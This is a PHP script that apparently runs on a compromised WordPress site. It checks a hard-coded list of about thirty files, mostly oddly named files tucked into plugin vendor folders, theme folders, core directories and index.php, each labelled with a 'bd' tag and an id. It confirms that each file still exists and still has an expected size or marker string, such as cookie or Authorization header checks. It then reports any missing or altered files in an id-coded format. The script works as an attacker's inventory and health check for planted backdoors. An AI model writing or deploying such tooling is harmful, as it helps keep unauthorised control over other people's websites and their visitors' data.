<?php   $r = '/home/stargop/icpc'; $x = ["/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php"=>"bd@@39942334@@If-Modified-Since",
"/wp-includes/html-api/class-wp-html-stack-event.php"=>"bd@@39953046@@Large-Allocation",
"/wp-content/languages/themes/aravalli-fr_FR.l10n.php"=>"bd@@34011200@@7810",
"/wp-content/plugins/elementor/vendor_prefixed/twig/src/Node/Expression/Test/form.php"=>"bd@@39943175@@538",
"/wp-content/plugins/google-site-kit/third-party/phpseclib/phpseclib/phpseclib/Crypt/EC/Curves/class.user.php"=>"bd@@39953168@@1097",
"/wp-content/plugins/google-site-kit/third-party/monolog/monolog/src/Monolog/Test/menu_reg.php"=>"bd@@39953170@@535",
"/wp-content/plugins/google-site-kit/third-party/google/apiclient-services/src/TagManager/Resource/function.math.php"=>"bd@@39943209@@588",
"/wp-content/plugins/google-site-kit/third-party/phpseclib/phpseclib/phpseclib/Math/Common/events_new.php"=>"bd@@39943217@@1020",
"/wp-includes/blocks/comments.php"=>"bd@@39942972@@Content-Security-Policy",
"/wp-content/plugins/elementor/vendor_prefixed/twig/src/Node/Expression/Test/form_execute.php"=>"bd@@34002107@@419",
"/wp-admin/ms-sites.php"=>"bd@@39942891@@$_COOKIE[3",
"/wp-admin/includes/network.php"=>"bd@@39953161@@94",
"/wp-content/themes/aravalli/inc/customizer-repeater/inc/customizer.php"=>"bd@@39953166@@85",
"/index.php"=>"bd@@34533134@@405",
"/wp-content/plugins/google-site-kit/third-party/phpseclib/phpseclib/phpseclib/Crypt/RSA/Formats/Keys/J.php"=>"bd@@39953167@@533",
"/wp-content/plugins/easy-wp-smtp/vendor_prefixed/symfony/polyfill-intl-normalizer/Resources/unidata/native.php"=>"bd@@39953172@@419",
"/wp-content/plugins/google-site-kit/third-party/google/apiclient-services/src/TagManager/adminedit.php"=>"bd@@39953173@@703",
"/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/laravel/serializable-closure/src/Contracts/jpgraph_log.php"=>"bd@@39943199@@373",
"/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/laravel/serializable-closure/src/Exceptions/mod_logged.php"=>"bd@@39943203@@414",
"/wp-content/plugins/elementor/core/common/modules/event-tracker/data/invitation.php"=>"bd@@35045436@@387",
"/wp-content/themes/twentytwentyfive/patterns/text-faqs.php"=>"bd@@39942476@@Sec-Websocket-Accept",
"/wp-content/plugins/elementor/vendor_prefixed/twig/src/Profiler/Node/xmlrpctag.php"=>"bd@@34821734@@1065",
"/wp-content/themes/twentytwentyfive/patterns/cta-book-locations.php"=>"bd@@39953071@@Authorization",
"/wp-includes/class-wp-date-query.php"=>"bd@@39943095@@Authorization",
"/wp-includes/feed-atom-comments.php"=>"bd@@39943115@@$_COOKIE[5",
"/wp-includes/author-template.php"=>"bd@@39953102@@26",
"/index.php"=>"bd@@33104307@@405",
"/index.php"=>"bd@@33222417@@405",
"/wp-content/plugins/elementor/modules/atomic-widgets/props-resolver/transformers/styles/dimensions.image.php"=>"bd@@33481429@@587",
"/wp-content/plugins/google-site-kit/third-party/phpseclib/phpseclib/phpseclib/Math/BigInteger/Engines/PHP/Reductions/conn.php"=>"ui@@2197@@1435"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!'); 